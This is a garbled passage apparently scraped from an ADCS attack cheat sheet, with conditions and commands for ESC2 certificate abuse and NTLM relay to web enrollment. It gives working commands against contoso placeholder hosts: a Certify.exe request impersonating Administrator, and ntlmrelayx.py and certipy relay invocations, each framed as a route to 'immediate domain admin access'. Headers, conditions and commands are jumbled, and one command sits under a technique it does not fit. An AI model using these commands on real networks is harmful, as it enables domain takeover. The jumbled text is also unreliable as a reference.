: Immediate domain admin access via Kerberos authentication. ESC2 – Certificate Template Allows Any EKU Condition : Template defines Any Purpose EKU (2.5.29.37.0) and allows low-priv enrollment.
Certify.exe request /ca:DC.CONTOSO.LOCAL\CONTOSO-CA /template:User /altname:Administrator Condition : ADCS web enrollment interfaces ( /certsrv/ , /CertSrv/ , /certsrv/mscep/ ) are enabled and not configured with extended protection or HTTPS. hacktricks adcs
# Relay NTLM auth from a compromised host to ADCS ntlmrelayx.py -t http://ca.contoso.com/certsrv/certfnsh.asp -smb2support --adcs --template DomainController certipy relay -target http://ca.contoso.com -template DomainController : Immediate domain admin access via Kerberos authentication